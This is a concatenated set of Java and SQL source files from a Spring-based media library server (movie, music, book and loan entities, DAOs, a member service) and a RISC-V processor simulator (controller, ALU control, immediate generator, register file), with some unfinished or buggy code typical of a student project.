public int getMovie_year() {
return movie_year;
}
public void setMovie_year(int movie_year) {
this.movie_year = movie_year;
}
public String getFile_name() {
return file_name;
}
public void setFile_name(String file_name) {
this.file_name = file_name;
}
public String getFile_type() {
return file_type;
}
public void setFile_type(String file_type) {
this.file_type = file_type;
}
public String getFile_path() {
return file_path;
}
public void setFile_path(String file_path) {
this.file_path = file_path;
}
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/MovieDao.java
package ie.tom.mediaserver.dao;
import ie.tom.mediaserver.entity.Movie;
import java.util.List;
import org.springframework.stereotype.Repository;
@Repository
public interface MovieDao {
void addMovie(Movie movie);
void updateMovie(Movie movie);
void saveMovie(Movie movie);
void deleteMovie(Movie movie);
Movie findById(int movie_id);
List<Movie> findByName(String movie_name);
List<Movie> findByGenre(String movie_genre);
List<Movie> findByYear(int movie_year);
List<Movie> findAll();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/MusicDao.java
package ie.tom.mediaserver.dao;
import ie.tom.mediaserver.entity.Music;
import java.util.List;
import org.springframework.stereotype.Repository;
@Repository
public interface MusicDao {
void addMusic(Music music);
void updateMusic(Music music);
void saveMusic(Music music);
void deleteMusic(Music music);
Music findById(int music_id);
List<Music> findByName(String music_name);
List<Music> findByGenre(String music_genre);
List<Music> findByYear(int music_year);
List<Music> findByArtist(String music_artist);
List<Music> findByAlbum(String music_album);
List<Music> findAll();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/mapper/LoanMapper.java
package ie.tom.mediaserver.dao.mapper;
import ie.tom.mediaserver.entity.Loan;
import java.sql.ResultSet;
import java.sql.SQLException;
import org.springframework.jdbc.core.RowMapper;
public class LoanMapper implements RowMapper<Loan> {
@Override
public Loan mapRow(ResultSet rs, int i) throws SQLException {
Loan l = new Loan();
l.setLoan_id(rs.getInt("loan_id"));
l.setMember_id(rs.getInt("member_id"));
l.setMedia_id(rs.getInt("media_id"));
l.setLoan_date(rs.getDate("loan_date"));
return l;
}
}
<file_sep>/MediaCore/target/classes/ie/tom/mediaserver/setup-database.sql
CREATE DATABASE media_server;
CREATE TABLE permission (
member_id INT NOT NULL,
permission VARCHAR(25) NOT NULL
);
CREATE TABLE member (
member_id INT NOT NULL PRIMARY KEY,
username VARCHAR(50) NOT NULL,
first_name VARCHAR(50),
last_name VARCHAR(50),
email VARCHAR(255) NOT NULL
);
CREATE TABLE movie (
movie_id INT NOT NULL PRIMARY KEY;
movie_name VARCHAR(255) NOT NULL,
movie_genre VARCHAR(25) NOT NULL,
movie_year INT NOT NULL,
file_name VARCHAR(255) NOT NULL,
file_type VARCHAR(10) NOT NULL,
file_path VARCHAR(255) NOT NULL
);
CREATE TABLE music (
song_id INT NOT NULL PRIMARY KEY;
song_name VARCHAR(255) NOT NULL,
song_genre VARCHAR(25) NOT NULL,
song_year INT NOT NULL,
song_artist VARCHAR(50) NOT NULL,
song_album VARCHAR(50) NOT NULL,
song_track_no int,
song_track_no_of int,
file_name VARCHAR(255) NOT NULL,
file_type VARCHAR(10) NOT NULL,
file_path VARCHAR(255) NOT NULL
);
CREATE TABLE book (
book_id INT NOT NULL PRIMARY KEY,
book_name VARCHAR(255) NOT NULL,
book_genre VARCHAR(25) NOT NULL,
book_year int NOT NULL,
book_author VARCHAR(50) NOT NULL,
file_name VARCHAR(255) NOT NULL,
file_type VARCHAR(10) NOT NULL,
file_path VARCHAR(255) NOT NULL
);<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/mapper/MovieMapper.java
package ie.tom.mediaserver.dao.mapper;
import java.sql.ResultSet;
import java.sql.SQLException;
import ie.tom.mediaserver.entity.Movie;
import org.springframework.jdbc.core.RowMapper;
public class MovieMapper implements RowMapper<Movie> {
@Override
public Movie mapRow(ResultSet rs, int i) throws SQLException {
Movie m = new Movie();
m.setMovie_id(rs.getInt("movie_id"));
m.setMovie_name(rs.getString("movie_name"));
m.setMovie_genre(rs.getString("movie_genre"));
m.setMovie_year(rs.getInt("movie_year"));
m.setFile_name(rs.getString("file_name"));
m.setFile_type(rs.getString("file_type"));
m.setFile_path(rs.getString("file_path"));
return m;
}
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Book.java
package ie.tom.mediaserver.entity;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.validator.constraints.NotEmpty;
@Entity
@XmlRootElement
@Table(name="book")
public class Book {
@Id
@GeneratedValue(strategy=GenerationType.IDENTITY)
private int book_id;
@NotEmpty
@Size(min=4, max=50)
private String book_name;
@NotEmpty
@Size(min=4, max=25)
private String book_genre;
@NotNull
private int book_year;
@NotEmpty
@Size(min=4, max=50)
private String book_author;
@NotEmpty
@Size(min=4, max=50)
private String file_name;
@NotEmpty
@Size(min=4, max=50)
private String file_type;
@NotEmpty
@Size(min=4, max=50)
private String file_path;
public int getBook_id() {
return book_id;
}
public void setBook_id(int book_id) {
this.book_id = book_id;
}
public String getBook_name() {
return book_name;
}
public void setBook_name(String book_name) {
this.book_name = book_name;
}
public String getBook_genre() {
return book_genre;
}
public void setBook_genre(String book_genre) {
this.book_genre = book_genre;
}
public int getBook_year() {
return book_year;
}
public void setBook_year(int book_year) {
this.book_year = book_year;
}
public String getBook_author() {
return book_author;
}
public void setBook_author(String book_author) {
this.book_author = book_author;
}
public String getFile_name() {
return file_name;
}
public void setFile_name(String file_name) {
this.file_name = file_name;
}
public String getFile_type() {
return file_type;
}
public void setFile_type(String file_type) {
this.file_type = file_type;
}
public String getFile_path() {
return file_path;
}
public void setFile_path(String file_path) {
this.file_path = file_path;
}
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Music.java
package ie.tom.mediaserver.entity;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.validator.constraints.NotEmpty;
@Entity
@XmlRootElement
@Table(name="music")
public class Music {
@Id
@GeneratedValue(strategy=GenerationType.IDENTITY)
private int song_id;
@NotEmpty
@Size(min=4, max=50)
private String song_name;
@NotEmpty
@Size(min=4, max=25)
private String song_genre;
@NotNull
private int song_year;
@NotEmpty
@Size(min=4, max=50)
private String song_artist;
@NotEmpty
@Size(min=4, max=50)
private String song_album;
@NotNull
private int song_track_no;
@NotNull
private int song_track_no_of;
@NotEmpty
@Size(min=4, max=50)
private String file_name;
@NotEmpty
@Size(min=4, max=50)
private String file_type;
@NotEmpty
@Size(min=4, max=50)
private String file_path;
public int getSong_id() {
return song_id;
}
public void setSong_id(int song_id) {
this.song_id = song_id;
}
public String getSong_name() {
return song_name;
}
public void setSong_name(String song_name) {
this.song_name = song_name;
}
public String getSong_genre() {
return song_genre;
}
public void setSong_genre(String song_genre) {
this.song_genre = song_genre;
}
public int getSong_year() {
return song_year;
}
public void setSong_year(int song_year) {
this.song_year = song_year;
}
public String getSong_artist() {
return song_artist;
}
public void setSong_artist(String song_artist) {
this.song_artist = song_artist;
}
public String getSong_album() {
return song_album;
}
public void setSong_album(String song_album) {
this.song_album = song_album;
}
public int getSong_track_no() {
return song_track_no;
}
public void setSong_track_no(int song_track_no) {
this.song_track_no = song_track_no;
}
public int getSong_track_no_of() {
return song_track_no_of;
}
public void setSong_track_no_of(int song_track_no_of) {
this.song_track_no_of = song_track_no_of;
}
public String getFile_name() {
return file_name;
}
public void setFile_name(String file_name) {
this.file_name = file_name;
}
public String getFile_type() {
return file_type;
}
public void setFile_type(String file_type) {
this.file_type = file_type;
}
public String getFile_path() {
return file_path;
}
public void setFile_path(String file_path) {
this.file_path = file_path;
}
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/service/impl/MemberServiceImpl.java
package ie.tom.mediaserver.service.impl;
import java.util.ArrayList;
import java.util.List;
import java.util.ListIterator;
import ie.tom.mediaserver.dao.LoanDao;
import ie.tom.mediaserver.dao.MemberDao;
import ie.tom.mediaserver.entity.Loan;
import ie.tom.mediaserver.entity.Member;
import ie.tom.mediaserver.service.MemberService;
import org.springframework.transaction.annotation.Transactional;
@Transactional
public class MemberServiceImpl implements MemberService {
private MemberDao memberDao;
private LoanDao loanDao;
public MemberServiceImpl(MemberDao memberDao, LoanDao loanDao) {
this.memberDao = memberDao;
this.loanDao = loanDao;
}
@Override
public void add(Member member) {
memberDao.addMember(member);
}
@Override
public void update(Member member) {
memberDao.updateMember(member);
}
@Override
public void save(Member member) {
memberDao.saveMember(member);
}
@Override
public void delete(Member member) {
memberDao.deleteMember(member);
}
@Override
public Member findMemberById(int member_id) {
return memberDao.findById(member_id);
}
@Override
public List<Member> findAllMembers() {
return memberDao.findAll();
}
@Override
public List<Member> findAllOverdueMembers() {
// get all members
List<Member> members = memberDao.findAll();
List<Member> overdueMembers = new ArrayList<Member>();
ListIterator<Member> memberList = members.listIterator();
// get all loans
List<Loan> loans = loanDao.findAll();
// cycle through all members
while(memberList.hasNext()) {
Member m = memberList.next();
ListIterator<Loan> loanList = loans.listIterator();
// cycle through all loans
while(loanList.hasNext()) {
Loan l = loanList.next();
// check is loan belongs to member
if(l.getMember_id() == m.getMember_id()) {
/*
* get current date and time
* compare to loan date and time
* 1 day / 24hours / 3 hours etc.
*/
// check if loan is overdue
if(1 > 0) {
overdueMembers.add(memberDao.findById(m.getMember_id()));
}
}
}
}
return overdueMembers;
}
}
| aad606d19ec23de49a04f327d01da04c7c9b5523 | [
"Markdown",
"Java",
"SQL"
] | 14 | Java | Tomaltach/MediaServer | 4fc97627058e5c2cdd978f153586cfe111c7bfb3 | 5f3d62066aefb9a185eac6dae457854126aa54d5 |
refs/heads/master | <repo_name>ecisneros/examen_angular<file_sep>/src/app/shared/layout/navigation/navigation.component.ts
import {Component, OnInit} from '@angular/core';
import {Modulo} from "../../../+dto/maintenance/modulo";
import {ModuloService} from "../../layout/navigation/http-modulo-service";
import {Observable} from "rxjs";
import {Response} from "@angular/http";
@Component({
selector: 'sa-navigation',
templateUrl: './navigation.component.html'
})
export class NavigationComponent implements OnInit {
error = '';
modulos: Array<Modulo> = [];
private authenticatedUser: any;
public errorMessage: string;
constructor(private moduloService: ModuloService) {
this.authenticatedUser = JSON.parse(sessionStorage.getItem("authenticatedUser") || '{}');
this.modulos = JSON.parse(localStorage.getItem("modulos") || '{}');
}
ngOnInit() {
}
}
| 973770bf8998cefcac3977e9488f7f7402659bcb | [
"TypeScript"
] | 1 | TypeScript | ecisneros/examen_angular | 90ce8b3f277ffe882f3020872b0bbb68f1063ccf | f792565149247420a32272afc3a37bc4123d0bea |
refs/heads/master | <repo_name>mmeyers00/nodejs-express-redis<file_sep>/README.md
nodejs-express-redis
====================
Example using Nodejs, Express, and Redis
<file_sep>/app.js
var fs = require('fs');
var express = require('express');
var app = express();
var nohm = require('nohm').Nohm;
var redis = require('redis').createClient();
nohm.setClient(redis);
nohm.model('User', {
properties: {
name: {
type: 'string',
unique: true,
validations: [
'notEmpty'
]
},
email: {
type: 'string',
unique: true,
validations: [
'email'
]
},
country: {
type: 'string',
defaultValue: 'Tibet',
validations: [
'notEmpty'
]
},
visits: {
type: function incrVisitsBy(value, key, old) {
return old + value;
},
defaultValue: 0,
index: true
}
},
methods: {
getContryFlag: function () {
return 'http://example.com/flag_'+this.p('country')+'.png';
},
}
});
app.get('/', function (req, res) {
var email = new Array();
var user = nohm.factory('User');
user.find(function (err, ids) {
ids.forEach(function (id, index) {
redis.hgetall("nohm:hash:User:"+id, function (err, obj) {
email.push(obj.email);
if(index == ids.length - 1)
res.jsonp({ids: ids, email: email});
});
});
});
});
app.get('/users', function(req, res){
for(i=200; i<1000; i++){
var user = nohm.factory('User');
user.p({
name: 'Mark'+i,
email: '<EMAIL>'+i+'<EMAIL>',
country: 'Mexico',
visits: 1
});
user.save(function (err) {
if (err === 'invalid') {
console.log('properties were invalid: ', user.errors);
} else if (err) {
console.log(err); // database or unknown error
} else {
console.log('saved user! :-)');
}
});
}
});
app.listen(80); | c5cc1cabe6f66a53e64f4c02a52843d392b9cda5 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | mmeyers00/nodejs-express-redis | d2025d7abd83d9f83a6128598db01d2bb53e3078 | 25a3192c3a25b5dc86c4649aa2f0c951fa93e758 |
refs/heads/master | <repo_name>spandcy/AdvML_project<file_sep>/README.md
# GR5242 Final Project <br>
## Team members:
- <NAME> (<EMAIL>)
- <NAME> (<EMAIL>)
- <NAME> (<EMAIL>)
- <NAME> (<EMAIL>)
## For **reproduce**:
- Two main folder for reproducing, **Baseline** and **Improve_Architecutres**, all of them could be reproduce on colab
- Data file is the CIFAR-10 by keras
- Output file contain the some of the captured images of tensorboard and the tensorboard event files
- The pdf file on the main pages is the **report** of our whole project, please grade with that **pdf** thanks!
## Overview
The [CIFAR-10 Dataset](https://www.cs.toronto.edu/~kriz/cifar.html) is an important image classification dataset. It consists of 60000 32x32 colour images in 10 classes (airplanes, automobiles, birds, cats, deer, dogs, frogs, horses, ships, and trucks), with 6000 images per class. There are 50000 training images and 10000 test images.<br>
The **GOALS** of this project are to:
- Learn how to preprocess the image data by using simple baseline models
- Implement different architectures Convolutional Neural Networks (CNN) classifiers using GPU-enabled Tensorflow
- Here we pick VGG-14/16/19; Network in Network, Fractional pooling and Wide Residual Network 14X6/16X6
- Compare different CNN architectures pros and cons
**Tools:**
- GPU-enabled Tensorflow,colab
Following [suggestions](http://nicercode.github.io/blog/2013-04-05-projects/) by [<NAME>](http://nicercode.github.io/about/#Team) (@richfitz). This folder is orgarnized as follows.
```
proj/
├── lib/
├── data/
├── doc/
├── figs/
└── output/
```
Please see each subfolder for a README file.
<file_sep>/Model_imporve_architecture/VGG/README.md
### VGG folder
+ VGG19 and VGG_16&14.ipynb can reproduct the tensorboard and network training.
+ VGG_14&16_batch_normalize.ipynb list the trainning error and test error with sample output
+ Below is part of the VGG_19 structure

+ Below is the test accuracy and loss of the three VGG network


<file_sep>/lib/README.md
### Code lib Folder
The lib directory contains various files with function definitions including code.<file_sep>/lib/load_data_helper_functions.py
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
from sklearn.metrics import confusion_matrix
import time
from datetime import timedelta
import math
import os
def unpickle(file):
import pickle
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
def convEncoding(input):
result = []
for code in input:
inner = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
inner[code] = 1.0
result.append(inner)
return result
def normalize(x):
maximum = np.max(x)
minimum = np.min(x)
return(x - minimum) / (maximum - minimum)
# This is the function that returns data
# The load_data() function returns the label that is NOT one-hot encoding
def load_data(norm = False):
data_dir = "D:/AML/FinalProject/data/cifar-10-batches-py/data_batch_"
data_dir_test = "D:/AML/FinalProject/data/cifar-10-batches-py/"
files = [data_dir + str(i) for i in range(1, 6)]
files_test = data_dir_test + 'test_batch'
data_batch = unpickle(files[0])
data_batch_test = unpickle(files_test)
# image_data: the numpy array of combined image data from 5 batch files
image_data = data_batch[b'data']
image_data_test = data_batch_test[b'data']
# label_data: array of labels combined from 5 batch files
label_data = data_batch[b'labels']
label_data_test = data_batch_test[b'labels']
for file in files[1:5]:
data_batch = unpickle(file)
image_data = np.concatenate((image_data, data_batch[b'data']), axis=0)
label_data += data_batch[b'labels']
images_train = image_data
images_test = image_data_test
labels_train = np.asarray(label_data)
labels_test = np.asarray(label_data_test)
# read in names of classes
class_names = ['airplane','automobile','bird','cat',
'deer','dog','frog','horse','ship','truck']
if (norm == True):
images_train = normalize(images_train)
images_test = normalize(images_test)
return images_train, images_test, labels_train, labels_test, class_names
<file_sep>/lib/preprocess_data.py
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
from sklearn.metrics import confusion_matrix
import time
from datetime import timedelta
import math
import os
def reshape(images, width):
'''reshape the input into 32x32x3 np.ndarray'''
# input images should be a 2-dimensional np.array
# e.g: [[1,2,3,...]] for one image only
first = images.shape[0]
result = np.zeros((first, width, width, 3))
index = 0
for image in images:
assert len(image) == width * width * 3
# Get color out of original array
redPixel = image[0:width * width] / 255
greenPixel = image[width * width:width * width * 2] / 255
bluePixel = image[width * width * 2:width * width * 3] / 255
reshaped = np.zeros((32, 32, 3))
for i in range(0, width): # row
for j in range(0, width): # column
point = np.zeros(3)
point[0] = redPixel[i * 32 + j]
point[1] = greenPixel[i * 32 + j]
point[2] = bluePixel[i * 32 + j]
# add to result
reshaped[i][j] = point
result[index] = reshaped
index += 1
return result
def plot_images(images, TrueClass, PredClass=None):
'''show images:
input np.ndarray, output images with true or predicted class labels'''
class_names = ['airplane','automobile','bird','cat',
'deer','dog','frog','horse','ship','truck']
assert len(images) == len(TrueClass) == 10
# Each image as a sub-plot: totally 2 rows 5 columns
fig, axes = plt.subplots(2, 5)
fig.subplots_adjust(hspace=0.3, wspace=0.3)
reshaped_images = reshape(images, 32)
for i, ax in enumerate(axes.flat):
# Plot image and smooth it
ax.imshow(reshaped_images[i],
interpolation='spline16')
# Name of the true class.
TrueName = class_names[TrueClass[i]]
if PredClass is None:
# Only show True class names
xlabel = "True: {0}".format(TrueName)
else:
# Show both True and Pred class names
PredName = class_names[PredClass[i]]
xlabel = "True: {0}\nPred: {1}".format(TrueName, PredName)
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
plt.show()
def distorted_image(image, cropped_size, training):
'''This function takes a single image from training set as input'''
if training:
# Randomly crop the input image.
image = tf.random_crop(image, size=[cropped_size, cropped_size, 3])
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image)
# Randomly adjust hue, contrast and saturation.
image = tf.image.random_hue(image, max_delta=0.05)
image = tf.image.random_contrast(image, lower=0.3, upper=1.0)
image = tf.image.random_brightness(image, max_delta=0.2)
image = tf.image.random_saturation(image, lower=0.0, upper=2.0)
# Limit the image pixels between [0, 1] in case of overflow.
image = tf.minimum(image, 1.0)
image = tf.maximum(image, 0.0)
else:
# Crop the input image around the centre so it is the same
# size as images that are randomly cropped during training.
image = tf.image.resize_image_with_crop_or_pad(image,
target_height=cropped_size,
target_width=cropped_size)
return image
def preprocess(images, cropped_size, training):
'''This function takes multiple images as input,
will call distorted_image()'''
images = tf.map_fn(lambda image: distorted_image(image, cropped_size, training), images)
return images
| 4357f285b134d0ce4b9e9a7a1fd1e57411a0fbce | [
"Markdown",
"Python"
] | 5 | Markdown | spandcy/AdvML_project | e267f6094864ed9027ece5fe4d364e7f15270e3a | d0b458c9e0273f644cf26a7bb173033fb1315c92 |
refs/heads/master | <repo_name>MetSystem/CommonTools<file_sep>/CommonTools.Win/FormFunc/GeneralForm.cs
using System;
using System.Windows.Forms;
using CommonTools.Common;
namespace CommonTools.Win.FormFunc
{
public partial class GeneralForm : BaseForm
{
public GeneralForm()
{
ApplySkin("McSkin");
InitializeComponent();
}
/// <summary>
/// 返回
/// </summary>
/// Author : Napoleon
/// Created : 2015-06-25 14:33:15
private void BtnReturn_Click(object sender, EventArgs e)
{
StartForm start = new StartForm();
Hide();
start.Show();
}
/// <summary>
/// 关闭页面
/// </summary>
/// Author : Napoleon
/// Created : 2015-06-25 14:32:57
private void GeneralForm_FormClosed(object sender, FormClosedEventArgs e)
{
Application.Exit();
}
/// <summary>
/// 生成自定义主键
/// </summary>
/// Author : Napoleon
/// Created : 2015-06-25 15:07:01
private void PicSubmitCustomId_Click(object sender, EventArgs e)
{
int guid1 = TxtGuid1.Text.ConvertToInt();
int guid2 = TxtGuid2.Text.ConvertToInt();
if (string.IsNullOrWhiteSpace(TxtDateTime.Text))
{
MessageBox.Show("请填写日期样式!");
return;
}
if (guid1 == -2 || guid2 == -2 || guid1 > 32 || guid2 > 32)
{
MessageBox.Show("请填写Guid起始位置(0-32)!");
return;
}
if (guid1 > guid2)
{
MessageBox.Show("Guid开始位置不能大于结束位置!");
return;
}
if (cobSelectOrderBy.SelectedIndex == -1)
{
MessageBox.Show("请选择生成顺序!");
return;
}
string datetime = DateTime.Now.ToString(TxtDateTime.Text);
string guid = Guid.NewGuid().ToString().Replace("-", "").Substring(guid1, guid2 - guid1);
switch (cobSelectOrderBy.SelectedIndex)
{
case 0://日期+Guid
TxtResult.Text = datetime + guid;
break;
case 1://Guid+日期
TxtResult.Text = guid + datetime;
break;
}
}
}
}
<file_sep>/README.md
2014-12-12:开发通用工具:加解密功能(单向散列算法、常用密钥算法、Base64和Image转换算法).
2015-06-25:解密错误进行友好提示,增加自定义主键功能.
2015-07-25:使用YUICompressor2.4.6.jar进行批量压缩打包js/css文件.
| 5ecb1c13534d9c860eda88176a74a9407d66164a | [
"Markdown",
"C#"
] | 2 | C# | MetSystem/CommonTools | 0868dbfb146edd862e54db32e95983c4006c26b6 | 9c9b2122fabb32c1145e8cd2a746f136a43a471d |
refs/heads/master | <file_sep>// Base URL for API: https://api.twitch.tv/kraken
// Twitch Client ID: 7dz3226i5692rzqdjzkkpy44kk7rewp
// Array for all Twitch streamers on this site's list
var streamers = ["freecodecamp", "sodapoppin", "brunofin", "comster404", "hutch"];
function getProfileInfo() {
// This function is to get the information for the streamers
// on our list and populate each list item with their pic,
// name, description if they are streaming, and their online status
twitchURL = 'https://api.twitch.tv/kraken/streams/';
var clientID = '?client_id=7dz3226i5692rzqdjzkkpy44kk7rewp&';
// Loop through array of streamers looking for their stream info
for (var i=0; i <streamers.length; i++) {
//alert(streamers[i]);
(function(i) {
$.getJSON(twitchURL+streamers[i]+clientID+'callback=?', function(json) {
// Get status of each user to test below
var status = document.getElementsByClassName('status')[i];
if (json.error == 'Not Found') {
status.innerHTML = 'Account Closed';
return;
}
// Set variables for pic, info, name to change later
var pic = document.getElementsByClassName('profile-pic')[i];
var info = document.getElementsByClassName('description')[i];
var name = document.getElementsByClassName('profile-name')[i];
var userName = json._links.channel.split('/');
userName = userName[userName.length-1];
var userURL = 'https://twitch.tv/'+userName;
// If the user doesn't exist, change status
if (json.error == "Not Found") {
status.innerHTML = "Account Closed";
} else if (json.stream == null) {
name.innerHTML = '<a href="'+userURL+'">'+userName+'</a>';
status.innerHTML = '<a href="'+userURL+'">'+'Offline'+'</a>';
} else {
// Change name/link, profile-pic src, stream info and status
pic.innerHTML = '<img src="'+json.stream.channel.logo+'">';
name.innerHTML = '<a href="'+userURL+'">'+userName+'</a>';
info.innerHTML = '<a href="'+userURL+'">'+json.stream.game+'</a>';
status.innerHTML = '<a href="'+userURL+'">'+'Online'+'</a>';
}
});
})(i);
}
}
window.onload = function() {
getProfileInfo();
}<file_sep># Twitch-Stream
Allows you to see which Twitch streamers are online and a short description.
| 07aec40cc0f9727e14872028af4252c12a513b54 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | jmorales2012/Twitch-Stream | fa1c1a3df5e5ab87110604cbf44021cee704de5c | 3a3205e8ec5d03fb9e7b3ec6e7ba71e984b42bf2 |
refs/heads/master | <file_sep>public class controller {
public boolean alu_src;
public String mem2reg;
public boolean reg_write;
public boolean mem_read;
public boolean mem_write;
//public String write_enable;
//public String read_enable;
public String aluop;
public boolean branch;
public boolean jalr_mode;
public boolean jal_mode;
//boolean lui_mode;
//String writeback;
public controller(String instr) throws Exception{
opcode op = instrOps.findOp(instr);
alu_src = ( op == opcode.OP_OP_IMM ||
op == opcode.OP_LOAD ||
op == opcode.OP_STORE ||
op == opcode.OP_JALR ||
op == opcode.OP_LUI);
switch (op){
case OP_LOAD:
case OP_LOAD_FP:
mem2reg = "01";
break;
case OP_AUIPC:
mem2reg = "10";
break;
case OP_JAL:
case OP_JALR:
mem2reg = "11";
break;
default:
mem2reg = "00";
}
switch (op){
case OP_LOAD:
case OP_OP_IMM:
case OP_OP:
case OP_JAL:
case OP_LUI:
case OP_AUIPC:
case OP_JALR:
reg_write = false;
default:
reg_write = true;
}
mem_read = (op == opcode.OP_LOAD);
mem_write = (op == opcode.OP_STORE);
switch(op){
case OP_BRANCH:
aluop = "01";
break;
case OP_LUI:
case OP_AUIPC:
case OP_JAL:
aluop = "11";
break;
case OP_OP:
case OP_OP_IMM:
aluop = "10";
break;
default:
aluop = "00";
}
branch = (op == opcode.OP_BRANCH);
jalr_mode = (op == opcode.OP_JALR);
jal_mode = (op == opcode.OP_JAL);
}
}
<file_sep>public final class immediate_generator {
public static String imm(String inst) throws Exception{
opcode op = instrOps.findOp(inst);
switch(op){
case OP_LOAD:
case OP_JALR:
String flippedImmLoad = bin.flipStr(inst.substring(20,32));
String extendedLoad = bin.signExtend(flippedImmLoad, 32); //signExtend extends bit 0, so we need to flip the string
return extendedLoad;
case OP_OP_IMM:
if (instrOps.func3(inst) == "001" || instrOps.func3(inst) == "101"){
String flippedImmImm = bin.flipStr(inst.substring(20,25));
return bin.bitExtend(flippedImmImm, 32, '0');
}
else{
String flippedImmImm2 = bin.flipStr(inst.substring(20,32));
return bin.signExtend(flippedImmImm2,32);
}
case OP_STORE:
String flippedImmStore = bin.flipStr(inst.substring(7,12) + inst.substring(25,32));
return bin.signExtend(flippedImmStore, 32);
case OP_LUI:
case OP_AUIPC:
return bin.bitExtend(inst.substring(12,31), 32, '0');
case OP_JAL:
String ImmJAL = "0" + inst.substring(21,31) + inst.substring(20,21) + inst.substring(12,20) + inst.substring(31,32);
return bin.signExtend(ImmJAL, 32);
case OP_BRANCH:
String ImmBr = inst.substring(8,12) + inst.substring(25,31) + inst.substring(7,8) + inst.substring(31,32);
return bin.signExtend(ImmBr, 32);
default:
return bin.bitExtend("0", 32, '0');
}
}
}
<file_sep>public enum opcode {
OP_LOAD,
OP_LOAD_FP,
OP_CUSTOM_0,
OP_MISC_MEM,
OP_OP_IMM,
OP_AUIPC,
OP_OP_IMM_32,
OP_STORE,
OP_STORE_FP,
OP_CUSTOM_1,
OP_AMO,
OP_OP,
OP_LUI,
OP_OP_32,
OP_MADD,
OP_MSUB,
OP_NMSUB,
OP_NMADD,
OP_OP_FP,
OP_CUSTOM_2,
OP_BRANCH,
OP_JALR,
OP_JAL,
OP_SYSTEM,
OP_CUSTOM_3
}
<file_sep>public final class alu_controller {
public static alu findOp(String aluop, String funct3, String funct7) throws Exception{
boolean[] operation = new boolean[4];
operation[3]= (((aluop.equals("10"))&&((funct3.equals("110")) || (funct3.equals("001")) || (funct3.equals("100"))||(funct7.equals("0000000") && (funct3.equals("101")))||(funct3.equals("011")))) ||
( (aluop.equals("01")) && ((funct3.equals("110")) || (funct3.equals("111")))));
operation[2]= (((aluop.equals("10"))&&((funct3.equals("000"))||(funct3.equals("001"))||(funct3.equals("100")) ) ) ||
((aluop.equals("00")) && ((funct3.equals("000"))||(funct3.equals("001"))||(funct3.equals("100")) || (funct3.equals("101")) || (funct3.equals("010"))) ) ||
((aluop.equals("01")) && ((funct3.equals("000")) || (funct3.equals("001")) || (funct3.equals("111")) || (funct3.equals("101")))) ||
(aluop.equals("11")));
operation[1]= (( (aluop.equals("10"))&& ((funct7.equals("0100000")&&(funct3.equals("000"))) || (funct3.equals("100")) ||(funct3.equals("101")) ) ) ||
((aluop.equals("01"))&& ((funct3.equals("000")) || (funct3.equals("001"))) ));
operation[0]= (( (aluop.equals("10")) && ((funct3.equals("010")) || (funct3.equals("011")) ) ) ||
((aluop.equals("01")) && ( (funct3.equals("100")) || (funct3.equals("101")) || (funct3.equals("110")) || (funct3.equals("111")))));
String result = "";
for (int i = 0; i < 4; i++ ){
if (operation[i]){result += "1";}
else {result += "0";}
}
return operation(result);
}
private static alu operation (String aluopcode) throws Exception{
switch (aluopcode){
case "0000":
return alu.ALU_AND;
case "0001":
return alu.ALU_OR;
case "0010":
return alu.ALU_ADD;
case "0110":
return alu.ALU_SUB;
case "1100":
return alu.ALU_NOR;
case "0111":
return alu.ALU_XOR;
case "1000":
return alu.ALU_SLT;
case "1001":
return alu.ALU_SLTU;
case "0100":
return alu.ALU_SRA;
case "0011":
return alu.ALU_SLL;
case "0101":
return alu.ALU_SRL;
case "1010":
return alu.ALU_SGE;
case "1011":
return alu.ALU_SGEU;
default:
throw new RISCVException("Unsupported ALU opcode: " + aluopcode);
}
}
}
<file_sep>public class registerFile {
private String[] registers;
/*
Register widths depend on the RISCV base variant. for RV32, they are 32 bits long,
RV64 are 64 bits long, RV128 are 128 bits long etc
*/
public registerFile(){
this.registers = new String[32];
//this.registers[0] = bin.bitExtend("0", 32, '0');
for (int i = 0; i < 32; i ++){
this.registers[i] = bin.bitExtend("0", 32, '0');
}
}
public String get(int reg){
return registers[reg];
}
public void handleWrite(String address, String val, boolean wrEnable){
if (wrEnable){
write(val, bin.uBinToInt(address));
}
}
private void write(String val, int reg){
if(reg > 32 || reg < 0){
throw new IndexOutOfBoundsException("Invalid register address: " + reg);
}
registers[reg] = val;
}
public void reset() {
for (int i = 0; i < 32; i++) {
registers[i] = bin.bitExtend("0", 32, '0');
}
}
}
<file_sep># processingProcessors
trying to understand riscv by writing it in java
Honestly ripes does too good of a job check them out:
https://github.com/mortbopet/Ripes
thank you for teaching me :)
<file_sep>import java.util.Scanner;
public class consoleInteract {
private Scanner reader;
private String[] commands = {"done", "next (n)", "inst", "opcode", "func3", "rs1", "rs2", "rd", "list", "readdata1", "readdata2", "immediate", "operation",
"aluop", "aluresult"};
public consoleInteract(){
reader = new Scanner(System.in);
}
public int read(registerFile rF, dataMemory dM, controller cont, int PC, String instr, String readData1, String readData2, String immediate, alu operation, String aluResult) throws Exception{
System.out.println("PC: " + PC);
while (true){
String s = reader.next();
switch (s){
case "done":
return -1; //-1 for done, 0 for pause, 1 for go next
